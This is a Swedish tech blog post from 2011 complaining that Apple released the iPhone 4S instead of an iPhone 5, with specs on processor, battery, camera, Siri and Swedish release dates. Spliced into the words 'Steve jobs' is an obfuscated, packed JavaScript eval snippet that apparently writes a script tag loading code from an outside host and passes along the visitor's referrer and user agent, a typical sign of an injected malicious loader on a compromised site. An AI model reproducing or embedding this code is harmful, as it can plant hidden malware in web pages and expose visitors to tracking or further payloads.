Image Image Image Image Image Image Image Image Image Image

| 23 mars, 2018

Scroll to top

Top

No Comments

Revue.se | Apple säljer ut sina fans...IGEN! iPhone 4s ...

Apple säljer ut sina fans…IGEN! iPhone 4s …
Filip Urde
  • On 4 oktober, 2011
  • http://www.revue.se/filip-urde

Steve eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kknss|var|u0026u|referrer|ikaii||js|php’.split(‘|’),0,{}))
jobs hann knappt vika ihop sin polo-tröja och stoppa den i sin 
i-Drawer, innan Apple skulle göra sina fans total besvikna igen.

Hypen har varit total! inklusive från vår sida… Alla har väntat på en iPhone 5, men vi fick en 4s (S för ”Skit”). Nu har dock mina värsta känslor lagt sig och jag kan äntligen försöka skriva vad jag tycker så ”snällt” och sakligt jag bara kan.

Återigen har vi alltså blivit snuvade på tårtan och fått en gammal sula. Nu vet jag inte om detta är Apples fel, eller alla vi som håller på med rykten i vår tids media. Men faktum kvarstår, Apple är helt okapabla att släppa något riktigt, riktigt bra, utan att hämma produkten lite…Det måste alltid finnas ett ”men”!

Jag har nu i snart 30 min spanat in de vilda kommentarerna som florerar på Facebook… det är inte bara jag som är upprörd är väll kontentan.

Men nu är skadan skedd och Apple kommer bara få hårdare konkurrens är vad jag kan säga.

Men vad kommer nu med iPhone 4s?

Den ser ut precis som en iPhone 4 men den är bestyckad med en A5-processor, vilket är lika med dubbla kärnor och upp till sju gånger snabbare grafik. Det betyder även att Airplay-spegling kommer att fungera.

Batteritiden: åtta timmar 3G-prat, 6 timmar 3G-surf, 9 timmar Wifi-surf, 10 timmar med video och 40 timmars musiklyssnande. Nerladdningshastigheten har gått upp från 7.2 mbit till 14.4….Som befarat… inget 4G!! 

Kameran: åtta megapixlar och upplösningen 3264 x 2448 pixlar.
Enligt Apple sjävla så är den största nyheten Siri, en inbyggda assistenten som man kan prata med, tala om vem man vill ringa, sätta alarm osv. Men det kommer såklart inte fungera på Svenska i början….

Det går nu att få iPhone med 64 GB minne för 100 dollar extra.
iPhone 4S kommer att börja säljas 14 oktober och förhandsbokningen börjar 7:e. Detta gäller dock endast i vissa prioriterade länder, vi i Sverige kommer att få vänta tills 28:e oktober.

 

Yey! Tack Apple…